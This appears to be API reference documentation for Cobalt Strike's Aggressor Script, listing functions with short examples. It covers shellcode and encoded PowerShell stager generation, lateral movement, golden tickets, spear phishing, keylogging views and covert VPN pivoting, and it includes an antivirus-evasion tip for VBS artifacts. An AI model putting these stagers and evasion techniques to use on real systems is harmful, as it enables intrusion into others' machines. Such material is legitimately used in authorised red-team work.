openCovertVPNSetup(*args, fork=False)
```

open the Covert VPN setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "VPN Pivoting" {
 local('$bid');
 foreach $bid ($1) {
  openCovertVPNSetup($bid);
 }
}

## openCredentialManager
```python
openCredentialManager(*args, fork=False)
```

Open the credential manager tab.
Example

openCredentialManager();

## openDownloadBrowser
```python
openDownloadBrowser(*args, fork=False)
```

Open the download browser tab
Example

openDownloadBrowser();

## openElevateDialog
```python
openElevateDialog(*args, fork=False)
```

Open the dialog to launch a privilege escalation exploit.
Arguments
$1 - the beacon ID
Example

item "Elevate" {
 local('$bid');
 foreach $bid ($1) {
  openElevateDialog($bid);
 }
}

## openEventLog
```python
openEventLog(*args, fork=False)
```

Open the event log.
Example

openEventLog();

## openFileBrowser
```python
openFileBrowser(*args, fork=False)
```

Open the file browser for a Beacon
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Browse Files" {
 local('$bid');
 foreach $bid ($1) {
  openFileBrowser($bid);
 }
}

## openGoldenTicketDialog
```python
openGoldenTicketDialog(*args, fork=False)
```

open a dialog to help generate a golden ticket
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Golden Ticket" {
 local('$bid');
 foreach $bid ($1) {
  openGoldenTicketDialog($bid);
 }
}

## openHTMLApplicationDialog
```python
openHTMLApplicationDialog(*args, fork=False)
```

Open the HTML Application Dialog.
Example

openHTMLApplicationDialog();

## openHostFileDialog
```python
openHostFileDialog(*args, fork=False)
```

Open the host file dialog.
Example

openHostFileDialog();

## openInterfaceManager
```python
openInterfaceManager(*args, fork=False)
```

Open the tab to manage Covert VPN interfaces
Example

openInterfaceManager();

## openJavaSignedAppletDialog
```python
openJavaSignedAppletDialog(*args, fork=False)
```

Open the Java Signed Applet dialog
Example

openJavaSignedAppletDialog();

## openJavaSmartAppletDialog
```python
openJavaSmartAppletDialog(*args, fork=False)
```

Open the Java Smart Applet dialog
Example

openJavaSmartAppletDialog();

## openJumpDialog
```python
openJumpDialog(*args, fork=False)
```

Open Cobalt Strike's lateral movement dialog
Arguments
$1 - the type of lateral movement. One of: psexec, psexec_psh, winrm, wmi
$2 - an array of targets to apply this action against
Example

openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));

## openKeystrokeBrowser
```python
openKeystrokeBrowser(*args, fork=False)
```

Open the keystroke browser tab
Example

openKeystrokeBrowser();

## openListenerManager
```python
openListenerManager(*args, fork=False)
```

Open the listener manager
Example

openListenerManager();

## openMakeTokenDialog
```python
openMakeTokenDialog(*args, fork=False)
```

open a dialog to help generate an access token
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Make Token" {
 local('$bid');
 foreach $bid ($1) {
  openMakeTokenDialog($bid);
 }
}

## openOfficeMacro
```python
openOfficeMacro(*args, fork=False)
```

Open the office macro export dialog
Example

openOfficeMacroDialog();

## openOrActivate
```python
openOrActivate(*args, fork=False)
```

If a Beacon console exists, make it active. If a Beacon console does not exist, open it.
Arguments
$1 - the Beacon ID
Example

item "&Activate" {
 local('$bid');
 foreach $bid ($1) {
  openOrActivate($bid);
 }
}

## openPayloadGeneratorDialog
```python
openPayloadGeneratorDialog(*args, fork=False)
```

Open the Payload Generator dialog.
Example

openPayloadGeneratorDialog();

## openPayloadHelper
```python
openPayloadHelper(*args, fork=False)
```

Open a payload chooser dialog.
Arguments
$1 - a callback function. Arguments: $1 - the selected listener.
Example

openPayloadHelper(lambda({
 bspawn($bid, $1);
}, $bid => $1));

## openPivotListenerSetup
```python
openPivotListenerSetup(*args, fork=False)
```

open the pivot listener setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Listener..." {
 local('$bid');
 foreach $bid ($1) {
  openPivotListenerSetup($bid);
 }
}

## openPortScanner
```python
openPortScanner(*args, fork=False)
```

Open the port scanner dialog
Arguments
$1 - an array of targets to scan
Example

openPortScanner(@("192.168.1.3"));

## openPortScannerLocal
```python
openPortScannerLocal(*args, fork=False)
```

Open the port scanner dialog with options to target a Beacon's local network
Arguments
$1 - the beacon to target with this feature
Example

item "Scan" {
 local('$bid');
 foreach $bid ($1) {
  openPortScannerLocal($bid);
 }
}

## openPowerShellWebDialog
```python
openPowerShellWebDialog(*args, fork=False)
```

Open the dialog to setup the PowerShell Web Delivery Attack
Example

openPowerShellWebDialog();

## openPreferencesDialog
```python
openPreferencesDialog(*args, fork=False)
```

Open the preferences dialog
Example

openPreferencesDialog();

## openProcessBrowser
```python
openProcessBrowser(*args, fork=False)
```

Open a process browser for one or more Beacons
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "Processes" {
 openProcessBrowser($1);
}

## openSOCKSBrowser
```python
openSOCKSBrowser(*args, fork=False)
```

Open the tab to list SOCKS proxy servers
Example

openSOCKSBrowser();

## openSOCKSSetup
```python
openSOCKSSetup(*args, fork=False)
```

open the SOCKS proxy server setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "SOCKS Server" {
 local('$bid');
 foreach $bid ($1) {
  openSOCKSSetup($bid);
 }
}

## openScreenshotBrowser
```python
openScreenshotBrowser(*args, fork=False)
```

Open the screenshot browser tab
Example

openScreenshotBrowser();

## openScriptConsole
```python
openScriptConsole(*args, fork=False)
```

Open the Aggressor Script console.
Example

openScriptConsole();

## openScriptManager
```python
openScriptManager(*args, fork=False)
```

Open the tab for the script manager.
Example

openScriptManager();

## openScriptedWebDialog
```python
openScriptedWebDialog(*args, fork=False)
```

Open the dialog to setup a Scripted Web Delivery Attack
Example

openScriptedWebDialog();

## openServiceBrowser
```python
openServiceBrowser(*args, fork=False)
```

Open service browser dialog
Arguments
$1 - an array of targets to show services for
Example

openServiceBrowser(@("192.168.1.3"));

## openSiteManager
```python
openSiteManager(*args, fork=False)
```

Open the site manager.
Example

openSiteManager();

## openSpawnAsDialog
```python
openSpawnAsDialog(*args, fork=False)
```

Open dialog to spawn a payload as another user
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Spawn As..." {
 local('$bid');
 foreach $bid ($1) {
  openSpawnAsDialog($bid);
 }
}

## openSpearPhishDialog
```python
openSpearPhishDialog(*args, fork=False)
```

Open the dialog for the spear phishing tool.
Example

openSpearPhishDialog();

## openSystemInformationDialog
```python
openSystemInformationDialog(*args, fork=False)
```

Open the system information dialog.
Example

openSystemInformationDialog();

## openSystemProfilerDialog
```python
openSystemProfilerDialog(*args, fork=False)
```

Open the dialog to setup the system profiler.
Example

openSystemProfilerDialog();

## openTargetBrowser
```python
openTargetBrowser(*args, fork=False)
```

Open the targets browser
Example

openTargetBrowser();

## openWebLog
```python
openWebLog(*args, fork=False)
```

Open the web log tab.
Example

openWebLog();

## openWindowsDropperDialog
```python
openWindowsDropperDialog(*args, fork=False)
```

Open the dialog to export the Windows dropper attack
Example

openWindowsDropperDialog();

## openWindowsExecutableDialog
```python
openWindowsExecutableDialog(*args, fork=False)
```

Open the dialog to generate a Windows executable
Example

openWindowsExecutableDialog();

## openWindowsExecutableStage
```python
openWindowsExecutableStage(*args, fork=False)
```

Open the dialog to generate a stageless Windows executable
Example

openWindowsExecutableStage();

## pgraph
```python
pgraph(*args, fork=False)
```

Generate the pivot graph GUI component.
Returns
The pivot graph GUI object (a javax.swing.JComponent)
Example

addVisualization("Pivot Graph", pgraph());

See Also
&showVisualization

## pivots
```python
pivots(*args, fork=False)
```

Returns a list of SOCKS pivots from Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each pivot.
Example

printAll(pivots());

## popup_clear
```python
popup_clear(*args, fork=False)
```

Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike's default popup menu definitions.
Arguments
$1 - the popup hook to clear registered menus for
Example

popup_clear("help");

popup help {
 item "My stuff!" {
  show_message("This is my menu!");
 }
}

## powershell
```python
powershell(*args, fork=False)
```

Returns a PowerShell one-liner to bootstrap the specified listener.
Arguments
$1 - the listener name
$2 - [true/false]: is this listener targeting local host?
$3 - x86|x64 - the architecture of the generated stager.
Notes
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A PowerShell one-liner to run the specified listener.
Example

println(powershell("my listener", false));

## powershell_encode_oneliner
```python
powershell_encode_oneliner(*args, fork=False)
```

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)
Arguments
$1 - the PowerShell expression to wrap into a one-liner.
Returns a powershell.exe one-liner to run the specified expression.
Example

$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);

## powershell_encode_stager
```python
powershell_encode_stager(*args, fork=False)
```

Returns a base64 encoded PowerShell script to run the specified shellcode
Arguments
$1 - shellcode to wrap
Returns
Returns a base64 encoded PowerShell suitable for use with powershell.exe's -enc option.
Example

$shellcode  = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");

## pref_get
```python
pref_get(*args, fork=False)
```

Grabs a string value from Cobalt Strike's preferences.
Arguments
$1 - the preference name
$2 - the default value [if there is no value for this preference]
Returns
A string with the preference value.
Example

$foo = pref_get("foo.string", "bar");

## pref_get_list
```python
pref_get_list(*args, fork=False)
```

Grabs a list value from Cobalt Strike's preferences.
Arguments
$1 - the preference name
Returns
An array with the preference values
Example

@foo = pref_get_list("foo.list");

## pref_set
```python
pref_set(*args, fork=False)
```

Set a value in Cobalt Strike's preferences
Arguments
$1 - the preference name
$2 - the preference value
Example

pref_set("foo.string", "baz!");

## pref_set_list
```python
pref_set_list(*args, fork=False)
```

Stores a list value into Cobalt Strike's preferences.
Arguments
$1 - the preference name
$2 - an array of values for this preference
Example

pref_set_list("foo.list", @("a", "b", "c"));

## previousTab
```python
previousTab(*args, fork=False)
```

Activate the tab that is to the left of the current tab.
Example

bind Ctrl+Left {
 previousTab();
}

## privmsg
```python
privmsg(*args, fork=False)
```

Post a private message to a user in the event log
Arguments
$1 - who to send the message to
$2 - the message
Example

privmsg("raffi", "what's up man?");

## prompt_confirm
```python
prompt_confirm(*args, fork=False)
```

Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.
Arguments
$1 - text in the dialog
$2 - title of the dialog
$3 - a callback function. Called when the user presses yes.
Example

prompt_confirm("Do you feel lucky?", "Do you?", {
 show_mesage("Ok, I got nothing");
});

## prompt_directory_open
```python
prompt_directory_open(*args, fork=False)
```

Show a directory open dialog.
Arguments
$1 - title of the dialog
$2 - default value
$3 - true/false: allow user to select multiple folders?
$4 - a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.
Example

prompt_directory_open("Choose a folder", $null, false, {
 show_message("You chose: $1");
});

## prompt_file_open
```python
prompt_file_open(*args, fork=False)
```

Show a file open dialog.
Arguments
$1 - title of the dialog
$2 - default value
$3 - true/false: allow user to select multiple files?
$4 - a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.
Example

prompt_file_open("Choose a file", $null, false, {
 show_message("You chose: $1");
});

## prompt_file_save
```python
prompt_file_save(*args, fork=False)
```

Show a file save dialog.
Arguments
$1 - default value
$2 - a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.
Example

prompt_file_save($null, {
 local('$handle');
 $handle = openf("> $+ $1");
 println($handle, "I am content");
 closef($handle);
});

## prompt_text
```python
prompt_text(*args, fork=False)
```

Show a dialog that asks the user for text.
Arguments
$1 - text in the dialog
$2 - default value in the text field.
$3 - a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.
Example

prompt_text("What is your name?", "Cyber Bob", {
 show_mesage("Hi $1 $+ , nice to meet you!");
});

## range
```python
range(*args, fork=False)
```

Generate an array of numbers based on a string description of ranges.
Arguments
$1 - a string with a description of ranges


Range
Result


103
The number 103


3-8
The numbers 3, 4, 5, 6, and 7.


2,4-6
The numbers 2, 4, and 5.


Returns
An array of numbers within the specified ranges.
Example

printAll(range("2,4-6"));

## removeTab
```python
removeTab(*args, fork=False)
```

Close the active tab
Example

bind Ctrl+D {
 removeTab();
}

## resetData
```python
resetData(*args, fork=False)
```

Reset Cobalt Strike's data model

## say
```python
say(*args, fork=False)
```

Post a public chat message to the event log.
Arguments
$1 - the message
Example

say("Hello World!");

## sbrowser
```python
sbrowser(*args, fork=False)
```

Generate the session browser GUI component. Shows Beacon AND SSH sessions.
Returns
The session browser GUI object (a javax.swing.JComponent)
Example

addVisualization("Session Browser", sbrowser());

See Also
&showVisualization

## screenshots
```python
screenshots(*args, fork=False)
```

Returns a list of screenshots from Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each screenshot.
Example

printAll(screenshots());

## script_resource
```python
script_resource(*args, fork=False)
```

Returns the full path to a resource that is stored relative to this script file.
Arguments
$1 - the file to get a path for
Returns
The full path to the specified file.
Example

println(script_resource("dummy.txt"));

## separator
```python
separator(*args, fork=False)
```

Insert a separator into the current menu tree.
Example

popup foo {
 item "Stuff" { ... }
 separator();
 item "Other Stuff" { ... }
}

## services
```python
services(*args, fork=False)
```

Returns a list of services in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each service.
Example

printAll(services());

## shellcode
```python
shellcode(*args, fork=False)
```

Returns raw shellcode for a specific Cobalt Strike listener
Arguments
$1 - the listener name
$2 - true/false: is this shellcode destined for a remote target?
$3 - x86|x64 - the architecture of the stager output.
Notes
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example

$data = shellcode("my listener", false, "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

## showVisualization
```python
showVisualization(*args, fork=False)
```

Switch Cobalt Strike visualization to a registered visualization.
Arguments
$1 - the name of the visualization
Example

bind Ctrl+H {
 showVisualization("Hello World");
}

See Also
&showVisualization

## show_error
```python
show_error(*args, fork=False)
```

Shows an error message to the user in a dialog box. Use this function to relay error information.
Arguments
$1 - the message text
Example

show_error("You did something bad.");

## show_message
```python
show_message(*args, fork=False)
```

Shows a message to the user in a dialog box. Use this function to relay information.
Arguments
$1 - the message text
Example

show_message("You've won a free ringtone");

## site_host
```python
site_host(*args, fork=False)
```

Host content on Cobalt Strike's web server
Arguments
$1 - the host for this site (&localip is a good default)
$2 - the port (e.g., 80)
$3 - the URI (e.g., /foo)
$4 - the content to host (as a string)
$5 - the mime-type (e.g., "text/plain")
$6 - a description of the content. Shown in Attacks -> Web Drive-by -> Manage.
$7 - use SSL or not (true or false)
Returns
The URL to this hosted site
Example

site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);

## site_kill
```python
site_kill(*args, fork=False)
```

Remove a site from Cobalt Strike's web server
Arguments
$1 - the port
$2 - the URI
Example

__removes the content bound to / on port 80__

site_kill(80, "/");

## sites
```python
sites(*args, fork=False)
```

Returns a list of sites tied to Cobalt Strike's web server.
Returns
An array of dictionary objects with information about each registered site.
Example

printAll(sites());

## ssh_command_describe
```python
ssh_command_describe(*args, fork=False)
```

Describe an SSH command.
Returns
A string description of the SSH command.
Arguments
$1 - the command
Example

println(beacon_command_describe("sudo"));

## ssh_command_detail
```python
ssh_command_detail(*args, fork=False)
```

Get the help information for an SSH command.
Returns
A string with helpful information about an SSH command.
Arguments
$1 - the command
Example

println(ssh_command_detail("sudo"));

## ssh_command_register
```python
ssh_command_register(*args, fork=False)
```

Register help information for an SSH console command.
Arguments
$1 - the command
$2 - the short description of the command
$3 - the long-form help for the command.
Example

ssh_alis echo {
 blog($1, "You typed: " . substr($1, 5));
}

ssh_command_register(
 "echo",
 "echo posts to the current session's log",
 "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");

## ssh_commands
```python
ssh_commands(*args, fork=False)
```

Get a list of SSH commands.
Returns
An array of SSH commands.
Example

printAll(ssh_commands());

## str_chunk
```python
str_chunk(*args, fork=False)
```

Chunk a string into multiple parts
Arguments
$1 - the string to chunk
$2 - the maximum size of each chunk
Returns
The original string split into multiple chunks
Example

__hint... :)__

else if ($1 eq "template.x86.ps1") {
 local('$enc');
 $enc = str_chunk(base64_encode($2), 61);
 return strrep($data, '%%DATA%%', join("' + '", $enc));
}

## str_decode
```python
str_decode(*args, fork=False)
```

Convert a string of bytes to text with the specified encoding.
Arguments
$1 - the string to decode
$2 - the encoding to use.
Returns
The decoded text.
Example

__convert back to a string we can use (from UTF16-LE)__

$text = str_decode($string, "UTF16-LE");

## str_encode
```python
str_encode(*args, fork=False)
```

Convert text to byte string with the specified character encoding.
Arguments
$1 - the string to encode
$2 - the encoding to use
Returns
The resulting string.
Example

__convert to UTF16-LE__

$encoded = str_encode("this is some text", "UTF16-LE");

## str_xor
```python
str_xor(*args, fork=False)
```

Walk a string and XOR it with the provided key.
Arguments
$1 - the string to mask
$2 - the key to use (string)
Returns
The original string masked with the specified key.
Example

$mask  = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");

## sync_download
```python
sync_download(*args, fork=False)
```

Sync a downloaded file (View -> Downloads) to a local path.
Arguments
$1 - the remote path to the file to sync. See &downloads
$2 - where to save the file locally
$3 - [optional] a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.
Example

__sync all downloads__

command ga {
 local('$download $lpath $name $count');
 foreach $count => $download (downloads()) {
  ($lpath, $name) = values($download, @("lpath", "name"));

  sync_download($lpath, script_resource("file $+ .$count"), lambda({
   println("Downloaded $1 [ $+ $name $+ ]");
  }, \$name));
 }
}

## targets
```python
targets(*args, fork=False)
```

Returns a list of host information in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each host.
Example

printAll(targets());

## tbrowser
```python
tbrowser(*args, fork=False)
```

Generate the target browser GUI component.
Returns
The target browser GUI object (a javax.swing.JComponent)
Example

addVisualization("Target Browser", tbrowser());

See Also
&showVisualization

## tokenToEmail
```python
tokenToEmail(*args, fork=False)
```

Covert a phishing token to an email address.
Arguments
$1 - the phishing token
Returns
The email address or "unknown" if the token is not associated with an email.
Example

set PROFILER_HIT {
 local('$out $app $ver $email');
 $email = tokenToEmail($5);
 $out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
 foreach $app => $ver ($4) {
  $out .= "\n\t $+ $[25]app $ver";
 }
 return "$out $+ \n\n";
}

## transform
```python
transform(*args, fork=False)
```

Transform shellcode into another format.
Arguments
$1 - the shellcode to transform
$2 - the transform to apply


Type
Description


array
comma separated byte values


hex
Hex-encode the value


powershell-base64
PowerShell.exe-friendly base64 encoder


vba
a VBA array() with newlines added in


vbs
a VBS expression that results in a string


veil
Veil-ready string (\x##\x##)


Returns
The shellcode after the specified transform is applied
Example

println(transform("This is a test!", "veil"));

## transform_vbs
```python
transform_vbs(*args, fork=False)
```

Transform shellcode into a VBS expression that results in a string
Arguments
$1 - the shellcode to transform
$2 - the maximum length of a plaintext run
Notes
Previously, Cobalt Strike would embed its stagers into VBS files as several Chr() calls concatened into a string.
Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
To get past this VBS limitation, Cobalt Strike opted to use Chr() calls for non-ASCII data and runs of double-quoted strings for printable characters.
This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.
Returns
The shellcode after this transform is applied
Example

println(transform_vbs("This is a test!", "3"));

## tstamp
```python
tstamp(*args, fork=False)
```

Format a time into a date/time value. This value does not include seconds.
Arguments
$1 - the time [milliseconds since the UNIX epoch]
Example

println("The time is now: " . tstamp(ticks()));

See Also
&dstamp
## url_open
```python
url_open(*args, fork=False)
```

Open a URL in the default browser.
Arguments
$1 - the URL to open
Example

command go {
 url_open("https://www.cobaltstrike.com/");
}

## users
```python
users(*args, fork=False)
```

Returns a list of users connected to this team server.
Returns
An array of users.
Example

foreach $user (users()) {
 println($user);
}

## vpn_interface_info
```python
vpn_interface_info(*args, fork=False)
```

Get information about a VPN interface.
Arguments
$1 - the interface name
$2 - [Optional] the key to extract a value for
Returns

%info = vpn_interface_info("interface");

Returns a dictionary with the metadata for this interface.

$value = vpn_interface_info("interface", "key");

Returns the value for the specified key from this interface's metadata
Example

__create a script console alias to interface info__

command interface {
 println("Interface $1");
 foreach $key => $value (vpn_interface_info($1)) {
  println("$[15]key $value");
 }
}

## vpn_interfaces
```python
vpn_interfaces(*args, fork=False)
```

Return a list of VPN interface names
Returns
An array of interface names.
Example

printAll(vpn_interfaces());

## vpn_tap_create
```python
vpn_tap_create(*args, fork=False)
```

Create a Covert VPN interface on the team server system.
Arguments
$1 - the interface name (e.g., phear0)
$2 - the MAC address ($null will make a random MAC address)
$3 - reserved; use $null for now.
$4 - the port to bind the VPN's channel to
$5 - the type of channel [bind, http, icmp, reverse, udp]
Example

vpn_tap_create("phear0", $null, $null, 7324, "udp");

## vpn_tap_delete
```python
vpn_tap_delete(*args, fork=False)
```

Destroy a Covert VPN interface
Arguments
$1 - the interface name (e.g., phear0)
Example

vpn_tap_destroy("phear0");

